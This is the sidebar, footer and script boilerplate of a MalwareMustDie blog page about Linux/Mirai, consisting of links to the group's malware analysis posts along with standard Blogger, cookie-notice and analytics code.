<li><a href='https://blog.malwaremustdie.org/2014/02/long-talk-av-tokyo-20135-kelihos.html'>AVTOKYO 2013.5 - Threats of Kelihos, CookieBomb, RedKit's and its Bad Actor</a></li>
<li><a href='https://blog.malwaremustdie.org/2013/12/short-talk-in-botconf-2013-kelihos.html'>BOTCONF 2013 - Kelihos: Botnet, Takedown, Mule Actor</a></li>
<li><a href='https://blog.malwaremustdie.org/2013/02/cve-2013-0634-this-ladyboyle-is-not.html'>CVE-2013-0634 This "Lady" Boyle is not a nice Lady at all</a></li>
<li><a href='https://blog.0day.jp/p/english-report-of-fhappi-freehosting.html'>APT-10 - FreeHosting APT w/PowerSploit Poison Ivy (FHAPPI) campaign aims Hongkong & Mongolia</a></li>
<li><a href='https://blog.malwaremustdie.org/2014/08/another-country-sponsored-malware.html'>APT-32 - The Vietnam Journalist Spy Campaign </a></li>
<li><a href='https://blog.malwaremustdie.org/2014/08/what-is-bad-stays-bad-legalized-any.html'>Targeted attack of "Operation Torpedo"</a></li>
<li><a href='https://old.reddit.com/r/LinuxMalware/comments/5d0jx4/malwaremustdie_closed_blog_usa_access_as_protest/'>Protest against usage of NSA malware spytool PITCHIMPAIR & INNOVATION on friendly countries</a></li>
<li><a href='https://blog.malwaremustdie.org/2014/11/china-elf-botnet-malware-infection.html'>China/PRC origin Linux botnet's malware infection and its distribution scheme unleashed</a></li>
<li><a href='https://blog.malwaremustdie.org/2013/06/full-disclosure-of-309-botbotnet-source.html'>Full disclosure of 309 Bots/Botnet Source Codes Found via Germany Torrent </a></li>
<li><a href='https://blog.malwaremustdie.org/2013/03/the-evil-came-back-darkleechs-apache.html'>The Evil Came Back: Linux/Darkleech's Apache Malware Module</a></li>
<li><a href='https://blog.malwaremustdie.org/2014/06/ddoser-as-service-camouflation-of-legit.html'>DDoS in a Bruter Service - A camouflage of Stresser/Booter</a></li>
<li><a href='https://blog.malwaremustdie.org/2012/10/how-far-phpc99shell-malware-can-go-from.html'>How EVIL the PHP/C99Shell can be? From SQL Dumper, Hacktools, to Trojan Distributor Future? </a></li>
<li><a href='https://blog.malwaremustdie.org/2014/06/a-journey-to-abused-ftp-sites-story-of.html'>A journey to abused FTP sites (story of: Shells, Malware, Bots, DDoS & Spam) - Part 2</a></li>
<li><a href='https://blog.malwaremustdie.org/2014/05/a-journey-to-ftp-abused-sites-story-of.html'>A journey to abused FTP sites (story of: Shells, Malware, Bots, DDoS & Spam) - Part 1</a></li>
<li><a href='https://blog.malwaremustdie.org/2014/02/how-public-services-like-amazon-aws.html'>Case Study: How legitimate internet services like Amazon AWS, DropBox, Google Project/Code & ShortURL got abused to infect malware</a></li>
<li><a href='https://blog.malwaremustdie.org/2013/05/story-of-unix-trojan-tsunami-ircbot-w.html'>Just another story of UNIX Trojan Tsunami/Kaiten.c (IRC/Bot) w/ Flooder, Backdoor at a hacked xBSD case</a></li>
<li><a href='https://blog.malwaremustdie.org/p/mon-mar-24-104232-jst-2014.html'>Discontinuation of "Malware Crusader" public forum</a></li>
<li><a href='https://blog.malwaremustdie.org/p/hall-of-shame.html'>Hall of Shame</a></li>
<li><a href='https://blog.malwaremustdie.org/p/malwaremustdie-blog-archive.html'>more..</a></li>
</ul>
<div class='clear'></div>
</div>
</div><div class='widget LinkList' data-version='1' id='LinkList4'>
<h2>Non-indexed (older) Analysis</h2>
<div class='widget-content'>
<ul>
<li><a href='https://blog.malwaremustdie.org/2013/11/a-step-by-step-decoding-guide-for.html'>Decoding Guide for CookieBomb's (as Front-end) Latest Threat, with Evil ESD.PHP Redirection (as the Back-end)</a></li>
<li><a href='https://blog.malwaremustdie.org/2013/07/a-note-of-modification-of-obfuscation.html'>Some Decoding note(s) on modified #CookieBomb attack's obfuscated injection code</a></li>
<li><a href='https://blog.malwaremustdie.org/2013/07/what-is-behind-cookiebomb-attack-by.html'>What is behind #CookieBomb attack? (by @malm0u53)</a></li>
<li><a href='https://blog.malwaremustdie.org/2014/01/and-another-detonating-method-of-new.html'>..And another "detonating" method of CookieBomb 2.0 - Part 2</a></li>
<li><a href='https://blog.malwaremustdie.org/2014/01/and-another-detonating-method-of-todays.html'>..And another "detonating" method of CookieBomb 2.0 - Part 1</a></li>
<li><a href='https://blog.malwaremustdie.org/2012/10/fuzzy-in-manual-cracking-of.html'>New PseudoRandom (JS/runforestrun?xxx=)</a></li>
<li><a href='https://blog.malwaremustdie.org/2012/12/jsrunforrestrun-infector-comeback-full.html'>JS/RunForrestRun Infection ComeBack</a></li>
<li><a href='https://blog.malwaremustdie.org/2013/04/cnc-analysis-of-citadel-trojan-bot.html'>CNC analysis of Citadel Trojan Bot-Agent - Part 2</a></li>
<li><a href='https://blog.malwaremustdie.org/2013/04/wireshark-analysis-of-citadel-trojan.html'>CNC analysis of Citadel Trojan Bot-Agent - Part 1</a></li>
<li><a href='https://blog.malwaremustdie.org/2012/09/cracking-of-strong-encrypted-phpirc-bot.html'>Cracking of Strong Encrypted PHP / IRC Bot (PBOT) </a></li>
<li><a href='https://blog.malwaremustdie.org/p/malwaremustdie-blog-archive.html'>more..</a></li>
</ul>
<div class='clear'></div>
</div>
</div><div class='widget Feed' data-version='1' id='Feed2'>
<h2>
</h2>
<div class='widget-content' id='Feed2_feedItemListDisplay'>
<span style='filter: alpha(25); opacity: 0.25;'>
<a href='https://blog.0day.jp/feeds/posts/default?alt=rss'>Loading...</a>
</span>
</div>
<div class='clear'></div>
</div><div class='widget Subscribe' data-version='1' id='Subscribe1'>
<div style='white-space:nowrap'>
<h2 class='title'>Subscribe To</h2>
<div class='widget-content'>
<div class='subscribe-wrapper subscribe-type-POST'>
<div class='subscribe expanded subscribe-type-POST' id='SW_READER_LIST_Subscribe1POST' style='display:none;'>
<div class='top'>
<span class='inner' onclick='return(_SW_toggleReaderList(event, "Subscribe1POST"));'>
<img class='subscribe-dropdown-arrow' src='https://resources.blogblog.com/img/widgets/arrow_dropdown.gif'/>
<img align='absmiddle' alt='' border='0' class='feed-icon' src='https://resources.blogblog.com/img/icon_feed12.png'/>
Posts
</span>
<div class='feed-reader-links'>
<a class='feed-reader-link' href='https://www.netvibes.com/subscribe.php?url=https%3A%2F%2Fblog.malwaremustdie.org%2Ffeeds%2Fposts%2Fdefault' target='_blank'>
<img src='https://resources.blogblog.com/img/widgets/subscribe-netvibes.png'/>
</a>
<a class='feed-reader-link' href='https://add.my.yahoo.com/content?url=https%3A%2F%2Fblog.malwaremustdie.org%2Ffeeds%2Fposts%2Fdefault' target='_blank'>
<img src='https://resources.blogblog.com/img/widgets/subscribe-yahoo.png'/>
</a>
<a class='feed-reader-link' href='https://blog.malwaremustdie.org/feeds/posts/default' target='_blank'>
<img align='absmiddle' class='feed-icon' src='https://resources.blogblog.com/img/icon_feed12.png'/>
                  Atom
                </a>
</div>
</div>
<div class='bottom'></div>
</div>
<div class='subscribe' id='SW_READER_LIST_CLOSED_Subscribe1POST' onclick='return(_SW_toggleReaderList(event, "Subscribe1POST"));'>
<div class='top'>
<span class='inner'>
<img class='subscribe-dropdown-arrow' src='https://resources.blogblog.com/img/widgets/arrow_dropdown.gif'/>
<span onclick='return(_SW_toggleReaderList(event, "Subscribe1POST"));'>
<img align='absmiddle' alt='' border='0' class='feed-icon' src='https://resources.blogblog.com/img/icon_feed12.png'/>
Posts
</span>
</span>
</div>
<div class='bottom'></div>
</div>
</div>
<div class='subscribe-wrapper subscribe-type-PER_POST'>
<div class='subscribe expanded subscribe-type-PER_POST' id='SW_READER_LIST_Subscribe1PER_POST' style='display:none;'>
<div class='top'>
<span class='inner' onclick='return(_SW_toggleReaderList(event, "Subscribe1PER_POST"));'>
<img class='subscribe-dropdown-arrow' src='https://resources.blogblog.com/img/widgets/arrow_dropdown.gif'/>
<img align='absmiddle' alt='' border='0' class='feed-icon' src='https://resources.blogblog.com/img/icon_feed12.png'/>
Comments
</span>
<div class='feed-reader-links'>
<a class='feed-reader-link' href='https://www.netvibes.com/subscribe.php?url=https%3A%2F%2Fblog.malwaremustdie.org%2Ffeeds%2F962351771858487603%2Fcomments%2Fdefault' target='_blank'>
<img src='https://resources.blogblog.com/img/widgets/subscribe-netvibes.png'/>
</a>
<a class='feed-reader-link' href='https://add.my.yahoo.com/content?url=https%3A%2F%2Fblog.malwaremustdie.org%2Ffeeds%2F962351771858487603%2Fcomments%2Fdefault' target='_blank'>
<img src='https://resources.blogblog.com/img/widgets/subscribe-yahoo.png'/>
</a>
<a class='feed-reader-link' href='https://blog.malwaremustdie.org/feeds/962351771858487603/comments/default' target='_blank'>
<img align='absmiddle' class='feed-icon' src='https://resources.blogblog.com/img/icon_feed12.png'/>
                  Atom
                </a>
</div>
</div>
<div class='bottom'></div>
</div>
<div class='subscribe' id='SW_READER_LIST_CLOSED_Subscribe1PER_POST' onclick='return(_SW_toggleReaderList(event, "Subscribe1PER_POST"));'>
<div class='top'>
<span class='inner'>
<img class='subscribe-dropdown-arrow' src='https://resources.blogblog.com/img/widgets/arrow_dropdown.gif'/>
<span onclick='return(_SW_toggleReaderList(event, "Subscribe1PER_POST"));'>
<img align='absmiddle' alt='' border='0' class='feed-icon' src='https://resources.blogblog.com/img/icon_feed12.png'/>
Comments
</span>
</span>
</div>
<div class='bottom'></div>
</div>
</div>
<div style='clear:both'></div>
</div>
</div>
<div class='clear'></div>
</div><div class='widget HTML' data-version='1' id='HTML4'>
<div class='widget-content'>
<img src="https://lh5.googleusercontent.com/proxy/7a-Sy6taVMPz5qCfJcwarW7nnRlF-fwSjHuPpm4G-slGou22nrtKfHm7RVsFcKWJHqHb9Q_sMZs-ERk=s0-d" width="0" height="0" border="0">
<!--
&#9769;act free from sins,
&#9769;speak the truth,
&#9769;be just,
&#9769;be brave,
&#9769;have faith,
&#9769;help, support, teach the weaks ,
&#9769;non nobis domine sed nomine tuo da gloriam.
-->
</div>
<div class='clear'></div>
</div></div>
</aside>
</div>
</div>
</div>
<div style='clear: both'></div>
<!-- columns -->
</div>
<!-- main -->
</div>
</div>
<div class='main-cap-bottom cap-bottom'>
<div class='cap-left'></div>
<div class='cap-right'></div>
</div>
</div>
<footer>
<div class='footer-outer'>
<div class='footer-cap-top cap-top'>
<div class='cap-left'></div>
<div class='cap-right'></div>
</div>
<div class='fauxborder-left footer-fauxborder-left'>
<div class='fauxborder-right footer-fauxborder-right'></div>
<div class='region-inner footer-inner'>
<div class='foot no-items section' id='footer-1'></div>
<table border='0' cellpadding='0' cellspacing='0' class='section-columns columns-2'>
<tbody>
<tr>
<td class='first columns-cell'>
<div class='foot no-items section' id='footer-2-1'></div>
</td>
<td class='columns-cell'>
<div class='foot no-items section' id='footer-2-2'></div>
</td>
</tr>
</tbody>
</table>
<!-- outside of the include in order to lock Attribution widget -->
<div class='foot section' id='footer-3'><div class='widget Attribution' data-version='1' id='Attribution1'>
<div class='widget-content' style='text-align: center;'>
(c)MalwareMustDie, 2012-2021. Read LEGAL DISCLAIMER before quoting or copying our contents. Powered by <a href='https://www.blogger.com' target='_blank'>Blogger</a>.
</div>
<div class='clear'></div>
</div></div>
</div>
</div>
<div class='footer-cap-bottom cap-bottom'>
<div class='cap-left'></div>
<div class='cap-right'></div>
</div>
</div>
</footer>
<!-- content -->
</div>
</div>
<div class='content-cap-bottom cap-bottom'>
<div class='cap-left'></div>
<div class='cap-right'></div>
</div>
</div>
</div>
<script type='text/javascript'>
    window.setTimeout(function() {
        document.body.className = document.body.className.replace('loading', '');
      }, 10);
  </script>
<script type='text/javascript'>
      (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
      (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
      m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
      })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
      ga('create', 'UA-180537376-1', 'auto', 'blogger');
      ga('blogger.send', 'pageview');
    </script>
<!--It is your responsibility to notify your visitors about cookies used and data collected on your blog. Blogger makes a standard notification available for you to use on your blog, and you can customise it or replace it with your own notice. See http://www.blogger.com/go/cookiechoices for more details.-->
<script defer='' src='/js/cookienotice.js'></script>
<script>
    document.addEventListener('DOMContentLoaded', function(event) {
      window.cookieChoices && cookieChoices.showCookieConsentBar && cookieChoices.showCookieConsentBar(
          (window.cookieOptions && cookieOptions.msg) || 'This site uses cookies from Google to deliver its services and to analyse traffic. Your IP address and user agent are shared with Google, together with performance and security metrics, to ensure quality of service, generate usage statistics and to detect and address abuse.',
          (window.cookieOptions && cookieOptions.close) || 'Ok',
          (window.cookieOptions && cookieOptions.learn) || 'Learn more',
          (window.cookieOptions && cookieOptions.link) || 'https://www.blogger.com/go/blogspot-cookies');
    });
  </script>

<script type="text/javascript" src="https://www.blogger.com/static/v1/widgets/1434883710-widgets.js"></script>
<script type='text/javascript'>
window['__wavt'] = 'AOuZoY4s3u9F_Q4PVYYFRRzVj8n0x4VzMA:1640306044742';_WidgetManager._Init('//www.blogger.com/rearrange?blogID\x3d8268358095554400245','//blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html','8268358095554400245');
_WidgetManager._SetDataContext([{'name': 'blog', 'data': {'blogId': '8268358095554400245', 'title': 'Malware Must Die!', 'url': 'https://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html', 'canonicalUrl': 'https://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html', 'homepageUrl': 'https://blog.malwaremustdie.org/', 'searchUrl': 'https://blog.malwaremustdie.org/search', 'canonicalHomepageUrl': 'https://blog.malwaremustdie.org/', 'blogspotFaviconUrl': 'https://blog.malwaremustdie.org/favicon.ico', 'bloggerUrl': 'https://www.blogger.com', 'hasCustomDomain': true, 'httpsEnabled': true, 'enabledCommentProfileImages': true, 'gPlusViewType': 'FILTERED_POSTMOD', 'adultContent': false, 'analyticsAccountNumber': 'UA-180537376-1', 'encoding': 'UTF-8', 'locale': 'en', 'localeUnderscoreDelimited': 'en', 'languageDirection': 'ltr', 'isPrivate': false, 'isMobile': false, 'isMobileRequest': false, 'mobileClass': '', 'isPrivateBlog': false, 'isDynamicViewsAvailable': true, 'feedLinks': '\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22Malware Must Die! - Atom\x22 href\x3d\x22https://blog.malwaremustdie.org/feeds/posts/default\x22 /\x3e\n\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/rss+xml\x22 title\x3d\x22Malware Must Die! - RSS\x22 href\x3d\x22https://blog.malwaremustdie.org/feeds/posts/default?alt\x3drss\x22 /\x3e\n\x3clink rel\x3d\x22service.post\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22Malware Must Die! - Atom\x22 href\x3d\x22https://www.blogger.com/feeds/8268358095554400245/posts/default\x22 /\x3e\n\n\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22Malware Must Die! - Atom\x22 href\x3d\x22https://blog.malwaremustdie.org/feeds/962351771858487603/comments/default\x22 /\x3e\n', 'meTag': '', 'adsenseHostId': 'ca-host-pub-1556223355139109', 'adsenseHasAds': false, 'adsenseAutoAds': false, 'ieCssRetrofitLinks': '\x3c!--[if IE]\x3e\x3cscript type\x3d\x22text/javascript\x22 src\x3d\x22https://www.blogger.com/static/v1/jsbin/2287435483-ieretrofit.js\x22\x3e\x3c/script\x3e\n\x3c![endif]--\x3e', 'view': '', 'dynamicViewsCommentsSrc': '//www.blogblog.com/dynamicviews/4224c15c4e7c9321/js/comments.js', 'dynamicViewsScriptSrc': '//www.blogblog.com/dynamicviews/20752fd4df382411', 'plusOneApiSrc': 'https://apis.google.com/js/plusone.js', 'disableGComments': true, 'sharing': {'platforms': [{'name': 'Get link', 'key': 'link', 'shareMessage': 'Get link', 'target': ''}, {'name': 'Facebook', 'key': 'facebook', 'shareMessage': 'Share to Facebook', 'target': 'facebook'}, {'name': 'BlogThis!', 'key': 'blogThis', 'shareMessage': 'BlogThis!', 'target': 'blog'}, {'name': 'Twitter', 'key': 'twitter', 'shareMessage': 'Share to Twitter', 'target': 'twitter'}, {'name': 'Pinterest', 'key': 'pinterest', 'shareMessage': 'Share to Pinterest', 'target': 'pinterest'}, {'name': 'Email', 'key': 'email', 'shareMessage': 'Email', 'target': 'email'}], 'disableGooglePlus': true, 'googlePlusShareButtonWidth': 0, 'googlePlusBootstrap': '\x3cscript type\x3d\x22text/javascript\x22\x3ewindow.___gcfg \x3d {\x27lang\x27: \x27en\x27};\x3c/script\x3e'}, 'hasCustomJumpLinkMessage': false, 'jumpLinkMessage': 'Read more', 'pageType': 'item', 'postId': '962351771858487603', 'postImageThumbnailUrl': 'https://lh3.googleusercontent.com/d1FGT8qEY4S6SABPZMtGv7j9kTEMwSOUW4mypPyP3Gom2jrfkyOteCFgva-RZhmoYnph77ISW3ZkFQ\x3ds72-w555-c-h130-no', 'postImageUrl': 'https://lh3.googleusercontent.com/d1FGT8qEY4S6SABPZMtGv7j9kTEMwSOUW4mypPyP3Gom2jrfkyOteCFgva-RZhmoYnph77ISW3ZkFQ\x3dw555-h130-no', 'pageName': 'MMD-0056-2016 - Linux/Mirai, how an old ELF malcode is recycled.. ', 'pageTitle': 'Malware Must Die!: MMD-0056-2016 - Linux/Mirai, how an old ELF malcode is recycled.. ', 'metaDescription': ''}}, {'name': 'features', 'data': {'sharing_get_link_dialog': 'true', 'sharing_native': 'false'}}, {'name': 'messages', 'data': {'edit': 'Edit', 'linkCopiedToClipboard': 'Link copied to clipboard!', 'ok': 'Ok', 'postLink': 'Post Link'}}, {'name': 'template', 'data': {'name': 'custom', 'localizedName': 'Custom', 'isResponsive': false, 'isAlternateRendering': false, 'isCustom': true}}, {'name': 'view', 'data': {'classic': {'name': 'classic', 'url': '?view\x3dclassic'}, 'flipcard': {'name': 'flipcard', 'url': '?view\x3dflipcard'}, 'magazine': {'name': 'magazine', 'url': '?view\x3dmagazine'}, 'mosaic': {'name': 'mosaic', 'url': '?view\x3dmosaic'}, 'sidebar': {'name': 'sidebar', 'url': '?view\x3dsidebar'}, 'snapshot': {'name': 'snapshot', 'url': '?view\x3dsnapshot'}, 'timeslide': {'name': 'timeslide', 'url': '?view\x3dtimeslide'}, 'isMobile': false, 'title': 'MMD-0056-2016 - Linux/Mirai, how an old ELF malcode is recycled.. ', 'description': 'MalwareMustDie (MMD) is a whitehat workgroup to reduce malware, this blog advocates research on new malware threats \x26 Linux malware.', 'featuredImage': 'https://lh3.googleusercontent.com/d1FGT8qEY4S6SABPZMtGv7j9kTEMwSOUW4mypPyP3Gom2jrfkyOteCFgva-RZhmoYnph77ISW3ZkFQ\x3dw555-h130-no', 'url': 'https://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html', 'type': 'item', 'isSingleItem': true, 'isMultipleItems': false, 'isError': false, 'isPage': false, 'isPost': true, 'isHomepage': false, 'isArchive': false, 'isLabelSearch': false, 'postId': 962351771858487603}}]);
_WidgetManager._RegisterWidget('_NavbarView', new _WidgetInfo('Navbar1', 'navbar', document.getElementById('Navbar1'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_HeaderView', new _WidgetInfo('Header1', 'header', document.getElementById('Header1'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_BlogView', new _WidgetInfo('Blog1', 'main', document.getElementById('Blog1'), {'cmtInteractionsEnabled': false, 'lightboxEnabled': true, 'lightboxModuleUrl': 'https://www.blogger.com/static/v1/jsbin/1619306617-lbx.js', 'lightboxCssUrl': 'https://www.blogger.com/static/v1/v-css/4076883957-lightbox_bundle.css'}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML1', 'sidebar-right-1', document.getElementById('HTML1'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_BlogSearchView', new _WidgetInfo('BlogSearch1', 'sidebar-right-1', document.getElementById('BlogSearch1'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_LinkListView', new _WidgetInfo('LinkList1', 'sidebar-right-1', document.getElementById('LinkList1'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_FeaturedPostView', new _WidgetInfo('FeaturedPost1', 'sidebar-right-1', document.getElementById('FeaturedPost1'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_LinkListView', new _WidgetInfo('LinkList2', 'sidebar-right-1', document.getElementById('LinkList2'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_LinkListView', new _WidgetInfo('LinkList3', 'sidebar-right-1', document.getElementById('LinkList3'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_LinkListView', new _WidgetInfo('LinkList4', 'sidebar-right-1', document.getElementById('LinkList4'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_FeedView', new _WidgetInfo('Feed2', 'sidebar-right-1', document.getElementById('Feed2'), {'title': '', 'showItemDate': true, 'showItemAuthor': false, 'feedUrl': 'https://blog.0day.jp/feeds/posts/default?alt\x3drss', 'numItemsShow': 5, 'loadingMsg': 'Loading...', 'openLinksInNewWindow': false, 'useFeedWidgetServ': 'true'}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_SubscribeView', new _WidgetInfo('Subscribe1', 'sidebar-right-1', document.getElementById('Subscribe1'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML4', 'sidebar-right-1', document.getElementById('HTML4'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_AttributionView', new _WidgetInfo('Attribution1', 'footer-3', document.getElementById('Attribution1'), {}, 'displayModeFull'));
</script>
</body>
</html>